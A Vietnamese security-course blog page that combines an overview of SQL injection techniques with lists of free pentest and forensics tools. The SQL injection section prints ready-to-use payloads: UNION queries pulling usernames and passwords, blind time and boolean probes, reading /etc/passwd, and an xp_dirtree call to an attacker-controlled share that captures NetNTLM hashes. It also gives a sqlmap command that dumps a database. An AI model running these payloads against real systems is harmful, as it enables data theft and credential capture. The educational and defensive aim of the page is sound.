SQL Injection vẫn là một trong những lỗ hổng bảo mật web nguy hiểm nhất trong năm 2025. Đáng ngạc nhiên là dù công nghệ phát triển vượt bậc, những lỗi bảo mật cổ điển này vẫn tồn tại và thậm chí còn trở nên tinh vi hơn. Bài viết này sẽ phân tích sâu từng kỹ thuật SQL Injection, từ cơ bản đến nâng cao, giúp bạn hiểu rõ cách thức tấn công và phương pháp phòng thủ hiệu quả.

Hiểu về SQL Injection trong bối cảnh 2025

Kỹ thuật IN-BAND: Tấn công trực tiếp

Kỹ thuật OUT-BAND: Khi cần callback

Kỹ thuật BLIND: Bay trong bóng tối

Kỹ thuật FUNCTIONS: Vũ khí hóa các chức năng cơ sở dữ liệu

Kỹ thuật OTHER: Những cách tiếp cận ít phổ biến nhưng nguy hiểm

SQL Injection hiện đại: Xu hướng mới 2025

Bảng So Sánh Kỹ Thuật SQL Injection 2025

<table style="border-collapse: collapse; width: 100%;">
<thead>
<tr style="background-color: #000000; color: white;">
<th style="border: 1px solid #000; padding: 8px; text-align: left;">Kỹ Thuật</th>
<th style="border: 1px solid #000; padding: 8px; text-align: left;">Mức Độ Dễ Khai Thác</th>
<th style="border: 1px solid #000; padding: 8px; text-align: left;">Khả Năng Phát Hiện</th>
<th style="border: 1px solid #000; padding: 8px; text-align: left;">Tác Động Tiềm Tàng</th>
</tr>
</thead>
<tbody>
<tr style="border: 1px solid #000;">
<td style="border: 1px solid #000; padding: 8px;">Union-based</td>
<td style="border: 1px solid #000; padding: 8px;">Trung bình</td>
<td style="border: 1px solid #000; padding: 8px;">Dễ</td>
<td style="border: 1px solid #000; padding: 8px;">Trích xuất dữ liệu nhạy cảm từ nhiều bảng.</td>
</tr>
<tr style="border: 1px solid #000;">
<td style="border: 1px solid #000; padding: 8px;">Error-based</td>
<td style="border: 1px solid #000; padding: 8px;">Dễ</td>
<td style="border: 1px solid #000; padding: 8px;">Dễ</td>
<td style="border: 1px solid #000; padding: 8px;">Tiết lộ cấu trúc cơ sở dữ liệu.</td>
</tr>
<tr style="border: 1px solid #000;">
<td style="border: 1px solid #000; padding: 8px;">HTTP/DNS Request</td>
<td style="border: 1px solid #000; padding: 8px;">Khó 🔴</td>
<td style="border: 1px solid #000; padding: 8px;">Khó</td>
<td style="border: 1px solid #000; padding: 8px;">Gửi dữ liệu nhạy cảm ra ngoài.</td>
</tr>
<tr style="border: 1px solid #000;">
<td style="border: 1px solid #000; padding: 8px;">NetNTLM Hash Stealing</td>
<td style="border: 1px solid #000; padding: 8px;">Khó 🔴</td>
<td style="border: 1px solid #000; padding: 8px;">Rất khó</td>
<td style="border: 1px solid #000; padding: 8px;">Xâm nhập toàn bộ miền.</td>
</tr>
<tr style="border: 1px solid #000;">
<td style="border: 1px solid #000; padding: 8px;">Time-based</td>
<td style="border: 1px solid #000; padding: 8px;">Khó 🔴</td>
<td style="border: 1px solid #000; padding: 8px;">Rất khó</td>
<td style="border: 1px solid #000; padding: 8px;">Trích xuất dữ liệu từng bit, chậm.</td>
</tr>
<tr style="border: 1px solid #000;">
<td style="border: 1px solid #000; padding: 8px;">Boolean-based</td>
<td style="border: 1px solid #000; padding: 8px;">Trung bình</td>
<td style="border: 1px solid #000; padding: 8px;">Khó</td>
<td style="border: 1px solid #000; padding: 8px;">Trích xuất thông tin qua điều kiện đúng/sai.</td>
</tr>
<tr style="border: 1px solid #000;">
<td style="border: 1px solid #000; padding: 8px;">Error-based (Blind)</td>
<td style="border: 1px solid #000; padding: 8px;">Khó 🔴</td>
<td style="border: 1px solid #000; padding: 8px;">Rất khó</td>
<td style="border: 1px solid #000; padding: 8px;">Đưa ra thông tin từ hành vi ứng dụng.</td>
</tr>
<tr style="border: 1px solid #000;">
<td style="border: 1px solid #000; padding: 8px;">File System</td>
<td style="border: 1px solid #000; padding: 8px;">Khó 🔴</td>
<td style="border: 1px solid #000; padding: 8px;">Rất khó</td>
<td style="border: 1px solid #000; padding: 8px;">Đọc/ghi tệp nhạy cảm, có thể chiếm server.</td>
</tr>
<tr style="border: 1px solid #000;">
<td style="border: 1px solid #000; padding: 8px;">OS Command</td>
<td style="border: 1px solid #000; padding: 8px;">Rất khó ☠️</td>
<td style="border: 1px solid #000; padding: 8px;">Rất khó</td>
<td style="border: 1px solid #000; padding: 8px;">Chạy lệnh hệ điều hành, kiểm soát server.</td>
</tr>
<tr style="border: 1px solid #000;">
<td style="border: 1px solid #000; padding: 8px;">UDF</td>
<td style="border: 1px solid #000; padding: 8px;">Rất khó ☠️</td>
<td style="border: 1px solid #000; padding: 8px;">Rất khó</td>
<td style="border: 1px solid #000; padding: 8px;">Duy trì hoặc vượt qua biện pháp bảo mật.</td>
</tr>
<tr style="border: 1px solid #000;">
<td style="border: 1px solid #000; padding: 8px;">Limit/Order/Group By Clause</td>
<td style="border: 1px solid #000; padding: 8px;">Trung bình</td>
<td style="border: 1px solid #000; padding: 8px;">Khó </td>
<td style="border: 1px solid #000; padding: 8px;">Thao túng kết quả truy vấn.</td>
</tr>
<tr style="border: 1px solid #000;">
<td style="border: 1px solid #000; padding: 8px;">Stack Queries</td>
<td style="border: 1px solid #000; padding: 8px;">Dễ</td>
<td style="border: 1px solid #000; padding: 8px;">Dễ</td>
<td style="border: 1px solid #000; padding: 8px;">Hành động phá hoại như xóa bảng.</td>
</tr>
<tr style="border: 1px solid #000;">
<td style="border: 1px solid #000; padding: 8px;">Second Order</td>
<td style="border: 1px solid #000; padding: 8px;">Khó 🔴</td>
<td style="border: 1px solid #000; padding: 8px;">Rất khó</td>
<td style="border: 1px solid #000; padding: 8px;">Tấn công gián tiếp, ảnh hưởng nhiều người dùng.</td>
</tr>
</tbody>
</table>

1️⃣ Hiểu về SQL Injection trong bối cảnh 2025

Năm 2025, SQL Injection vẫn đứng vững trong danh sách OWASP Top 10. Lý do? Không phải vì thiếu biện pháp phòng chống, mà chính là sự kết hợp của:

Các hệ thống legacy chưa được nâng cấp

Áp lực phát triển nhanh khiến dev bỏ qua các biện pháp bảo mật

Sự phức tạp ngày càng tăng của ứng dụng web hiện đại

Các kỹ thuật mới để bypass các giải pháp bảo mật

Để thấu hiểu SQL Injection, trước tiên cần hiểu rằng đây là kỹ thuật tận dụng các lỗi trong việc xử lý input của người dùng để chèn (inject) các câu lệnh SQL trái phép vào database. Khi thành công, kẻ tấn công có thể đọc, thay đổi, xóa hoặc thậm chí chiếm quyền điều khiển toàn bộ hệ thống.

2️⃣ Kỹ thuật IN-BAND: Tấn công trực tiếp

IN-BAND là nhóm kỹ thuật phổ biến nhất, nơi kẻ tấn công có thể nhận kết quả trực tiếp trong cùng kênh truyền.

Kỹ thuật này sử dụng toán tử 

 để kết hợp kết quả của câu lệnh độc hại với câu lệnh ban đầu.

' UNION SELECT username, password FROM users--

Tại sao nó nguy hiểm? Vì kẻ tấn công có thể trích xuất dữ liệu từ bất kỳ bảng nào trong cơ sở dữ liệu. Trong một case study thực tế, một ứng dụng mua sắm bị khai thác thông qua payload:

?get_selected_category=1&cat_id=3' UNION SELECT 1,2,3,4,5,6,7,database()#

Kết quả? Toàn bộ thông tin của database, bao gồm cả tên người dùng và mật khẩu, đều bị lộ.

Kỹ thuật này ép cơ sở dữ liệu ném ra lỗi có chứa thông tin nhạy cảm.

' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT version()), 0x7e))--

Error-based đặc biệt tinh vi vì nó biến các thông báo lỗi—vốn được thiết kế để giúp developer—thành công cụ rò rỉ thông tin. Trong nhiều trường hợp, một lỗi đơn giản như "You have an error in your SQL syntax" có thể tiết lộ loại database đang sử dụng, mở đường cho các cuộc tấn công chuyên biệt tiếp theo.

3️⃣ Kỹ thuật OUT-BAND: Khi cần callback

OUT-BAND là nhóm kỹ thuật được sử dụng khi kẻ tấn công không thể nhận kết quả trực tiếp, buộc phải tìm cách "gọi về" (callback) để lấy dữ liệu.

'; DECLARE @q VARCHAR(8000); SELECT @q = 0x73656c...;EXEC @q;--

Kỹ thuật này buộc database server tạo kết nối đến một server do kẻ tấn công kiểm soát, thường là thông qua HTTP hoặc DNS. Điều này giúp bypass hầu hết các filter ở tầng ứng dụng.

Fun fact: Theo nghiên cứu từ Zenodo, các database như MSSQL và Oracle đặc biệt dễ bị tấn công qua kênh DNS, cho phép exfiltrate dữ liệu mà không để lại nhiều dấu vết trong log.

'; EXEC xp_dirtree '\\attacker-server\share';--

Đây là kỹ thuật cao cấp buộc Windows server xác thực với một SMB share của kẻ tấn công, khiến hệ thống vô tình gửi hash xác thực NetNTLM. Từ hash này, kẻ tấn công có thể thực hiện các cuộc tấn công Pass-the-Hash hoặc crack nó để lấy mật khẩu.

Đáng chú ý là cách tấn công này có thể dẫn đến xâm nhập toàn bộ domain Windows, biến một lỗ hổng SQL đơn giản thành thảm họa an ninh quy mô lớn.

4️⃣ Kỹ thuật BLIND: Bay trong bóng tối

BLIND là nhóm kỹ thuật được sử dụng khi kẻ tấn công không thể thấy kết quả trực tiếp, phải "đoán mò" từng chút một.

' IF (SELECT ASCII(SUBSTRING(username,1,1)) FROM users WHERE id=1) > 97 WAITFOR DELAY '0:0:5'--

Kỹ thuật này sử dụng độ trễ thời gian để trích xuất dữ liệu từng bit. Nếu câu lệnh điều kiện đúng, database sẽ tạm dừng một khoảng thời gian xác định trước khi trả về kết quả. Đây là phương pháp chậm nhưng vô cùng hiệu quả khi không có cách nào khác để đọc dữ liệu.

' AND (SELECT ASCII(SUBSTRING(username,1,1)) FROM users WHERE id=1) > 97--

Tương tự như time-based, nhưng thay vì độ trễ, Boolean-based dựa vào việc trang có hiển thị kết quả hay không để xác định điều kiện đúng/sai. Nếu bạn từng chơi trò "20 câu hỏi", đây chính xác là cách kẻ tấn công "hỏi" database để tìm thông tin.

: Khi tham gia khóa Web Pentest của CyberJutsu, các học viên được trực tiếp thực hành các kỹ thuật Blind SQL Injection trên các lab thực tế, giúp hiểu rõ cách khai thác dù không thấy kết quả trực tiếp.

5️⃣ Kỹ thuật FUNCTIONS: Vũ khí hóa các chức năng cơ sở dữ liệu

FUNCTIONS là nhóm kỹ thuật tận dụng các chức năng sẵn có của database để mở rộng tầm tấn công.

' UNION SELECT LOAD_FILE('/etc/passwd')--

Kỹ thuật này lạm dụng các hàm như 

 trong MySQL để đọc file từ hệ thống, hoặc 

 để ghi file. Đây là cách SQL Injection vượt qua ranh giới từ "lộ dữ liệu" sang "chiếm toàn quyền server".

Trong MSSQL, xp_cmdshell cho phép thực thi lệnh hệ điều hành trực tiếp từ database. Hầu hết các DBA đều biết đây là một tính năng nguy hiểm, nhưng nhiều người vẫn bật nó vì lý do "tiện lợi" hoặc "tương thích legacy".

Fun fact: Trong một nghiên cứu năm 2024, 37% MSSQL server dễ bị tấn công qua xp_cmdshell vì database admin quên tắt tính năng này sau khi cài đặt hoặc bảo trì hệ thống.

Kỹ thuật này tải các hàm tùy chỉnh vào database để mở rộng khả năng tấn công. Đặc biệt trong MySQL, kẻ tấn công có thể tạo UDF để thực thi mã C/C++ tùy ý trên server.

6️⃣ Kỹ thuật OTHER: Những cách tiếp cận ít phổ biến nhưng nguy hiểm

ORDER BY (SELECT password FROM users WHERE username='admin')--

Developers thường chỉ tập trung filter WHERE clause, quên rằng các phần khác như ORDER BY, LIMIT, GROUP BY cũng có thể bị inject. Đây là lý do kỹ thuật này vẫn hiệu quả trong nhiều trường hợp.

Kỹ thuật này thực thi nhiều câu lệnh SQL trong một request. Khác với UNION, Stack Queries cho phép thực hiện các hành động phá hoại như xóa bảng, thay đổi mật khẩu admin, hoặc thêm tài khoản backdoor.

Đây là dạng tấn công tinh vi nhất - kẻ tấn công chèn payload vào database nhưng nó không kích hoạt ngay, mà "ngủ đông" cho đến khi được sử dụng bởi một thao tác khác trong hệ thống.

Tưởng tượng như việc cài một quả bom hẹn giờ vào database - ban đầu nó vô hại, nhưng sau đó có thể kích hoạt gây hại cho nhiều người dùng khác. Điều này đặc biệt khó phát hiện vì bề ngoài, input đã được sanitize đúng cách.

7️⃣ SQL Injection hiện đại: Xu hướng mới 2025

Với sự phổ biến của NoSQL và các tính năng JSON trong các RDBMS hiện đại (PostgreSQL, MySQL 8+, SQL Server), xuất hiện các kỹ thuật tấn công mới lạm dụng chức năng JSON để bypass WAF.

8️⃣ Kỹ thuật bypass WAF tiên tiến

Năm 2025, Web Application Firewall (WAF) đã trở nên thông minh hơn, nhưng vẫn phải đối mặt với các kỹ thuật bypass mới:

: Mã hóa input nhiều lần bằng nhiều phương thức khác nhau

: Sử dụng các cú pháp thay thế ít được biết đến

2025 chứng kiến sự gia tăng của các công cụ tự động hóa kết hợp AI để tìm và khai thác lỗ hổng SQL:

SQLMap với script tùy chỉnh phân tích hành vi ứng dụng

Các công cụ fuzzing thông minh học từ các phản hồi trước để tối ưu hóa payload

Công cụ phân tích log tự động phát hiện các dấu hiệu tấn công tinh vi

: Tại CyberJutsu, chúng tôi liên tục cập nhật chương trình Web Pentest với các kỹ thuật tấn công mới nhất, bao gồm cả JSON-Based SQL Injection (hay còn gọi là NoSQL Injection) và Bypass WAF. Học viên không chỉ biết sử dụng tool mà còn hiểu rõ bản chất, "học để phá vỡ, phá vỡ để thấu hiểu".

Sử dụng Prepared Statements hoặc Parameterized Queries là biện pháp hiệu quả nhất. Ví dụ trong PHP PDO:

$stmt = $pdo->prepare('SELECT * FROM users WHERE username = :username'); 

$stmt->execute(['username' => $username]);

Các framework ORM hiện đại như Hibernate, Django ORM, Entity Framework... đều có cơ chế bảo vệ sẵn. Tuy nhiên, cần thận trọng khi sử dụng các hàm raw query.

Kết hợp WAF với các giải pháp bảo vệ runtime như RASP (Runtime Application Self-Protection) tạo thành lớp phòng thủ toàn diện.

Tổng hợp SQL Injection Techniques: Phân Tích Toàn Diện (2025)

Top 10 Công Cụ Pentest Miễn Phí, State-of-the-Art (Update 2025)

Trong thế giới an ninh mạng không ngừng biến động, việc sở hữu bộ công cụ pentest phù hợp giống như một samurai có thanh kiếm tốt - nó không đảm bảo chiến thắng, nhưng chắc chắn tăng cơ hội thành công của bạn. Không cần các giải pháp đắt đỏ, những công cụ mã nguồn mở, hoàn toàn miễn phí dưới đây đủ sức giúp bạn thực hiện các chiến dịch kiểm thử xâm nhập hiệu quả.

 được cập nhật đến năm 2025, được phân loại rõ ràng theo từng nhóm chức năng. Mỗi công cụ đều được phân tích chi tiết về ưu nhược điểm, với những ví dụ thực tế sát với môi trường làm việc của pentester.

Công cụ Pentest Mạng - Nmap, Wireshark

Công cụ Pentest Web - OWASP ZAP, SQLmap

Công cụ Pentest Wireless - Aircrack-ng

Công cụ Exploitation - Metasploit Framework

Công cụ Password Cracking - John the Ripper

Lời khuyên chọn công cụ phù hợp

Trong lĩnh vực an ninh mạng, các công cụ pentest miễn phí không chỉ tiết kiệm chi phí mà còn cung cấp sức mạnh ngang bằng với giải pháp thương mại. Từ 

quét mạng, phân tích gói tin, kiểm thử ứng dụng web đến khai thác lỗ hổng

, mỗi công cụ trong Top 10 đều đại diện cho "state-of-the-art" 2025 trong lĩnh vực của nó.

Tại CyberJutsu, chúng tôi tin rằng việc hiểu bản chất công cụ quan trọng hơn việc chỉ biết sử dụng chúng. "Hack to learn, not learn to hack" - triết lý này giúp bạn không chỉ biết CÁCH dùng công cụ mà còn hiểu TẠI SAO chúng hoạt động như vậy, từ đó phát hiện lỗ hổng sâu sắc hơn mà các công cụ tự động không thể.

Thành thạo các công cụ này không chỉ hữu ích cho pentest chuyên nghiệp mà còn mở ra cơ hội trong lĩnh vực bug bounty - nơi bạn có thể kiếm từ vài trăm đến hàng nghìn đô la cho mỗi lỗ hổng phát hiện được. Hàng loạt công ty công nghệ lớn như Google, Microsoft, Meta đều có chương trình bug bounty hào phóng, chờ đợi những "thợ săn" tài năng.

Chúng tôi đã phân loại các công cụ theo nhóm chức năng để bạn dễ theo dõi. Mỗi phần sẽ giới thiệu một đến hai công cụ tiêu biểu kèm theo phân tích thực tế. Hãy cùng bắt đầu!

Công cụ Pentest Mạng (Network Pentesting) 🌐

 (Network Mapper) là công cụ quét cổng và khám phá mạng không thể thiếu trong arsenal của bất kỳ pentester nào. Nmap hoạt động bằng cách gửi các gói tin đặc biệt và phân tích phản hồi để phát hiện host, cổng mở và dịch vụ đang chạy.

NSE (Nmap Scripting Engine) với hàng trăm script kiểm tra lỗ hổng

Linh hoạt với nhiều tùy chọn scan và kịch bản

Hoàn toàn miễn phí và mã nguồn mở

Cộng đồng lớn, tài liệu phong phú

Giao diện dòng lệnh (Zenmap GUI chỉ hỗ trợ một phần)

Quét tạo nhiều log, dễ bị phát hiện

Cần kiến thức để phân tích kết quả hiệu quả

 Trong buổi kiểm thử mạng doanh nghiệp, pentester có thể dùng lệnh 

 để phát hiện tất cả thiết bị trong mạng, liệt kê dịch vụ và phiên bản. Kết quả hiển thị một máy chủ Windows đang chạy SMB trên cổng 445 với phiên bản dễ bị tấn công, tạo tiền đề cho việc khai thác tiếp theo.

Tip từ CyberJutsu: Khi học Nmap, đừng cố nhớ tất cả tham số. Thay vào đó, hãy hiểu logic đằng sau các loại quét. Ví dụ, 

 (TCP connect scan) như thế nào, và khi nào nên dùng cái nào.

 là trình phân tích giao thức mạng mã nguồn mở hàng đầu, giúp bạn "nhìn thấu" mọi gói tin đang lưu chuyển trên mạng. Wireshark cho phép bạn chụp và phân tích chi tiết từng gói tin - đây là công cụ được coi là "kính hiển vi" trong mạng máy tính.

Bộ lọc mạnh mẽ để tìm đúng dữ liệu cần thiết

Tái kết hợp luồng TCP/UDP để phân tích phiên

Xuất đối tượng (file, hình ảnh) từ luồng dữ liệu

Phân tích cực kỳ chi tiết đến từng bit dữ liệu

Giao diện trực quan với bộ lọc mạnh

Đa nền tảng, được các chuyên gia tin dùng

Cộng đồng hỗ trợ lớn và liên tục cập nhật

Lượng thông tin lớn, dễ gây ngợp cho người mới

Chỉ phân tích thụ động, không cảnh báo tự động

Đòi hỏi kiến thức mạng sâu để khai thác tối đa

 Sau khi khai thác được quyền truy cập vào mạng nội bộ, pentester dùng Wireshark bắt gói tin trên segment đó. Nhờ filter 

, họ phát hiện một ứng dụng nội bộ đang gửi thông tin đăng nhập dạng plaintext - một phát hiện nghiêm trọng cần báo cáo ngay.

Hiểu biết sâu về Wireshark không chỉ giúp bạn trong pentest, mà còn vô giá khi debug vấn đề mạng phức tạp - kỹ năng được rất nhiều nhà tuyển dụng săn đón.

Công cụ Pentest Web (Web Application Pentesting) 🌍

 (Zed Attack Proxy) là công cụ quét lỗ hổng ứng dụng web mã nguồn mở do OWASP duy trì. ZAP hoạt động như một proxy chặn giữa trình duyệt và ứng dụng web để phân tích, sửa đổi request/response và phát hiện lỗ hổng.

Intercepting Proxy (chặn và sửa đổi HTTP/HTTPS)

Automated Scanner (quét thụ động & chủ động)

Spider/Crawler (thu thập nội dung web)

Fuzzer (thử các dữ liệu ngẫu nhiên để tìm lỗi)

Hỗ trợ API để tích hợp vào quy trình CI/CD

Miễn phí 100% và được OWASP bảo trợ

Tính năng toàn diện từ quét tự động đến công cụ thủ công

Hỗ trợ cả người mới (dễ dùng) lẫn chuyên gia (tùy biến sâu)

Tích hợp tốt vào quy trình DevSecOps

Giao diện UX chưa mượt bằng công cụ thương mại như Burp Suite

Cần bổ sung plugin cho một số chức năng nâng cao

Tốc độ quét đôi lúc chậm hơn giải pháp trả phí

 Khi pentest một ứng dụng web nội bộ, pentester cấu hình trình duyệt qua ZAP Proxy, sử dụng Spider để thu thập mọi URL và tham số, sau đó chạy Active Scan trên toàn bộ ứng dụng. ZAP phát hiện một lỗ hổng Cross-Site Scripting (XSS) Stored nghiêm trọng trong form đăng ký người dùng, cho phép chèn và thực thi mã JavaScript vào trang.

Một thợ săn bug bounty đã sử dụng chính ZAP để phát hiện lỗ hổng IDOR (Insecure Direct Object Reference) trên một nền tảng thương mại điện tử lớn, cho phép truy cập trái phép vào thông tin đơn hàng của người dùng khác. Sau khi báo cáo, anh nhận được phần thưởng $5,000 - minh chứng cho giá trị của công cụ miễn phí này trong tay người biết cách sử dụng nó.

Khi học Web Pentest, hiểu sâu về cơ chế hoạt động của các lỗ hổng quan trọng hơn việc chỉ biết chạy tool. Hãy thử xây dựng labs tự tạo lỗ hổng để hiểu bản chất của từng vấn đề. Trong khóa 

, chúng tôi tập trung vào cách "Hack để hiểu" - giúp bạn không chỉ phát hiện mà còn nắm vững nguyên nhân sâu xa của từng lỗ hổng.

 là công cụ mã nguồn mở chuyên tự động phát hiện và khai thác lỗ hổng SQL Injection. SQLmap có thể tự phát hiện loại database và thực hiện một loạt các kỹ thuật khai thác từ trích xuất dữ liệu đến chiếm quyền điều khiển server.

Tự động phát hiện và khai thác SQL Injection

Hỗ trợ nhiều loại DB (MySQL, MSSQL, Oracle, PostgreSQL...)

Thực thi câu lệnh SQL tùy ý và thậm chí lấy shell

Tự động và thông minh - tiết kiệm thời gian pentester

Hỗ trợ nhiều loại SQLi và cơ sở dữ liệu

Liên tục cập nhật các kỹ thuật mới

Hoạt động gây nhiều log, không "lén lút"

Trường hợp phức tạp vẫn cần hiểu biết thủ công

 trên URL nghi ngờ dính SQL Injection. Thay vì thử thủ công, họ chạy:

sqlmap -u "http://target.com/products.php?id=1" --batch --dump

SQLmap tự xác định tham số dính lỗi dạng Union-based, tìm cấu trúc database, và trích xuất toàn bộ thông tin người dùng cùng hash mật khẩu - một phát hiện nghiêm trọng cần khắc phục ngay.

Công cụ Pentest Wireless (Wireless Security) 📡

 là bộ công cụ đánh giá bảo mật mạng Wi-Fi (802.11), bao gồm nhiều thành phần: airodump-ng (quét/thu thập gói tin), aireplay-ng (tấn công/inject gói), aircrack-ng (crack WEP/WPA)...

Top 10 Công Cụ Pentest Miễn Phí 2025

Top 10 Công Cụ Digital Forensics Miễn Phí (2025) – Vũ Khí Không Thể Thiếu Cho DFIR

Trong thời đại nơi các vụ tấn công mạng ngày càng phức tạp và tinh vi, lĩnh vực Digital Forensics & Incident Response (DFIR) đòi hỏi chuyên gia phải trang bị bộ công cụ toàn diện. May mắn thay, nhiều công cụ forensics hiện đại đang được cung cấp hoàn toàn miễn phí, cho phép chúng ta thu thập và phân tích chứng cứ kỹ thuật số mà không cần đầu tư nguồn lực tài chính khổng lồ.

Bài viết dưới đây sẽ giới thiệu 10 công cụ digital forensics miễn phí hàng đầu năm 2025, được phân loại theo vai trò trong quy trình điều tra hiện đại. Từ tạo ảnh (imaging) đĩa và phân tích bộ nhớ, đến săn lùng mối đe dọa trên quy mô doanh nghiệp và forensics thiết bị di động - bạn sẽ có trong tay bộ vũ khí mạnh mẽ để đối mặt với mọi thách thức trong điều tra số.

FTK Imager – Thu thập chứng cứ và tạo ảnh đĩa

Autopsy – Nền tảng phân tích forensics đĩa

Volatility – Framework phân tích bộ nhớ

Plaso – Tự động tạo timeline (log2timeline)

Timesketch – Phân tích dòng thời gian

Wireshark – Bắt và phân tích gói tin mạng

Zeek – Giám sát an ninh mạng và ghi log

KAPE – Thu thập dữ liệu triage Windows

Velociraptor – Giám sát endpoint và săn mối đe dọa

Mobile Verification Toolkit (MVT) – Forensics thiết bị di động

1. FTK Imager – Thu thập chứng cứ và tạo ảnh đĩa

Mọi cuộc điều tra chỉ có thể thành công khi bắt đầu với 

việc thu thập chứng cứ đúng quy trình pháp lý

. FTK Imager đóng vai trò then chốt trong việc tạo bản sao bit-by-bit chính xác của đĩa và các thiết bị lưu trữ mà không làm thay đổi nguồn gốc. Đây thường là công cụ đầu tiên mà chuyên gia ứng phó sự cố sử dụng để bảo tồn ổ cứng hoặc bộ nhớ trước khi tiến hành phân tích sâu.

 (hoặc RAM) và xem trước nội dung ở chế độ chỉ đọc. Bằng cách tạo ảnh của đĩa, USB, CD/DVD, v.v., người ứng phó có thể làm việc trên bản sao dữ liệu, giữ nguyên tính toàn vẹn của chứng cứ gốc.

Tạo ảnh pháp lý theo nhiều định dạng (E01/EnCase, raw/DD) với tùy chọn chia thành phân đoạn

 và duyệt nội dung hệ thống tệp trước khi sử dụng bộ công cụ forensics đầy đủ

Tạo giá trị hash MD5/SHA của các bản thu để xác minh tính toàn vẹn

Nhẹ và nhanh, hữu ích cho việc tạo ảnh nhanh trên hệ thống đang hoạt động (thậm chí có thể bắt bộ nhớ dễ bay hơi trên Windows)

 Công cụ GUI chỉ chạy trên Windows. Tuy nhiên, nó có thể tạo ảnh đĩa từ bất kỳ hệ điều hành nào (Windows, Linux, macOS) bằng cách đọc ở cấp độ sector.

Bắt đầu mỗi cuộc điều tra forensics bằng việc thu thập chứng cứ đúng cách là yếu tố quyết định thành công. Đây chính là lý do FTK Imager trở thành công cụ không thể thiếu trong bộ kit của mọi chuyên gia DFIR.

2. Autopsy – Nền tảng phân tích forensics đĩa

 là nền tảng mã nguồn mở hàng đầu để phân tích chúng. Autopsy là giao diện forensics thân thiện với người dùng được xây dựng trên The Sleuth Kit, có khả năng đào sâu vào ảnh đĩa để trích xuất tệp, artifacts và khám phá những gì đã xảy ra trên hệ thống. Nó đóng vai trò như một bộ công cụ điều tra end-to-end, thường được so sánh với các công cụ thương mại như EnCase hoặc FTK, nhưng hoàn toàn miễn phí.

 Autopsy cung cấp giao diện tập trung để phân tích hệ thống tệp Windows, Linux và macOS, khôi phục tệp đã xóa, kiểm tra hoạt động người dùng (lịch sử web, email, registry, v.v.) và thậm chí phân tích dữ liệu thiết bị di động. Nhà điều tra có thể tạo case, thêm bằng chứng từ ảnh, và tận dụng các module của Autopsy để phân tích dữ liệu.

 Tự động tạo dòng thời gian các sự kiện hệ thống tệp (tạo, sửa đổi tệp, v.v.) để giúp tái tạo sự cố

 Lập chỉ mục từ khóa để tìm kiếm (ví dụ: tìm tất cả các xuất hiện của "password") và lọc tệp đã biết tốt/xấu qua bộ hash

Trích xuất web và artifacts ứng dụng:

 Các module tích hợp để phân tích lịch sử trình duyệt, cache, cookie, lưu trữ email, Windows Registry, v.v.

 Khôi phục tệp đã xóa hoặc cắt ra các phân đoạn dữ liệu. Autopsy cũng có thể nhập kết quả từ các công cụ khác và hỗ trợ plugin bên thứ ba, giúp mở rộng chức năng.

 Autopsy chạy trên Windows, và cũng hỗ trợ Linux và macOS (vì nó dựa trên Java). Nó có thể phân tích phương tiện từ tất cả các loại hệ điều hành chính (NTFS, FAT/exFAT, HFS+, EXT*, v.v.).

Hiểu sâu hệ thống tệp và khôi phục dữ liệu là kỹ năng cốt lõi của chuyên gia bảo mật. Tại CyberJutsu, chúng tôi luôn nhấn mạnh tầm quan trọng của việc này trong các khóa học Web Penetration Testing - nơi bạn học cách khai thác lỗ hổng Directory Traversal và hiểu cách hệ thống tệp hoạt động, từ đó áp dụng vào cả kỹ thuật tấn công lẫn kỹ năng phòng thủ.

3. Volatility – Framework phân tích bộ nhớ

 là yếu tố quan trọng để phát hiện malware trong bộ nhớ, khóa mã hóa, tiến trình đang chạy và các artifact dễ bay hơi khác. Volatility Framework là công cụ mã nguồn mở mạnh mẽ để phân tích RAM dump từ hệ thống bị xâm phạm. Khi sự cố liên quan đến malware tiên tiến hoặc tấn công fileless, người ứng phó sẽ dùng Volatility để tiết lộ những gì đang hoạt động trong bộ nhớ.

 Volatility cho phép nhà điều tra phân tích một ảnh bộ nhớ (RAM) đã bắt được và trích xuất thông tin như tiến trình đang chạy, DLL đã tải, kết nối mạng đang mở, registry hive trong bộ nhớ, bằng chứng về tiêm tiến trình, v.v. Nó hỗ trợ kiến trúc plugin: mỗi plugin thực hiện một phân tích cụ thể (liệt kê tiến trình, quét mẫu malware, dump các phần bộ nhớ, v.v.).

 Phân tích RAM dump từ Windows, Linux, macOS và thậm chí cả thiết bị Android trong một framework. Tính linh hoạt này giúp bạn điều tra bộ nhớ từ hầu hết các hệ thống.

 Hàng trăm plugin để tự động hóa các tác vụ phân tích phổ biến (liệt kê tiến trình, trích xuất registry, tìm kiếm chuỗi trong bộ nhớ, phát hiện malware bằng cách phát hiện mẫu, v.v.). Ví dụ, các plugin có thể tìm hash thông tin đăng nhập trong bộ nhớ hoặc phát hiện rootkit ẩn bằng cách so sánh cấu trúc kernel dự kiến và thực tế.

Cộng đồng phát triển và mở rộng:

 Là một dự án mở, Volatility thường xuyên cập nhật với nghiên cứu mới nhất. Nhà phân tích có thể viết các plugin tùy chỉnh (bằng Python) để xử lý malware mới hoặc phiên bản OS mới. Cộng đồng dự án năng động luôn đóng góp các plugin cho các artifact mới.

 Volatility chạy trên Windows, Linux hoặc macOS (bất kỳ hệ thống nào hỗ trợ Python). Nó có thể 

xử lý ảnh bộ nhớ từ tất cả các phiên bản OS chính

 (Windows XP đến Windows 11, các bản phân phối Linux phổ biến, Mac OS X/macOS, v.v.) với hồ sơ hoặc tệp ký hiệu thích hợp.

4. Plaso – Tự động tạo dòng thời gian (log2timeline)

Các cuộc điều tra forensics hiệu quả thường đòi hỏi việc 

 các sự kiện từ nhiều nguồn log khác nhau. 

 là công cụ mã nguồn mở tự động tạo "siêu dòng thời gian" bằng cách tổng hợp dấu thời gian từ nhiều artifact forensics vào một đầu ra theo thứ tự thời gian. Điều này giúp nhà phân tích thấy chuỗi sự kiện (sửa đổi tệp, mục nhập log, hoạt động người dùng, v.v.) trước và trong sự cố.

 Plaso phân tích nhiều loại tệp log và artifact (lịch sử trình duyệt, log sự kiện OS, metadata hệ thống tệp, log ứng dụng, v.v.) từ ảnh đĩa hoặc dump dữ liệu, và tạo ra dòng thời gian tổng hợp các sự kiện ở định dạng CSV hoặc khác. Về cơ bản, đây là công cụ backend nhận bằng chứng và tạo ra danh sách sự kiện có dấu thời gian được sắp xếp.

 Theo mặc định, Plaso sẽ thu thập 

tất cả sự kiện có dấu thời gian

Blogs

Tổng hợp SQL Injection Techniques: Phân Tích Toàn Diện (2025)

Top 10 Công Cụ Pentest Miễn Phí 2025

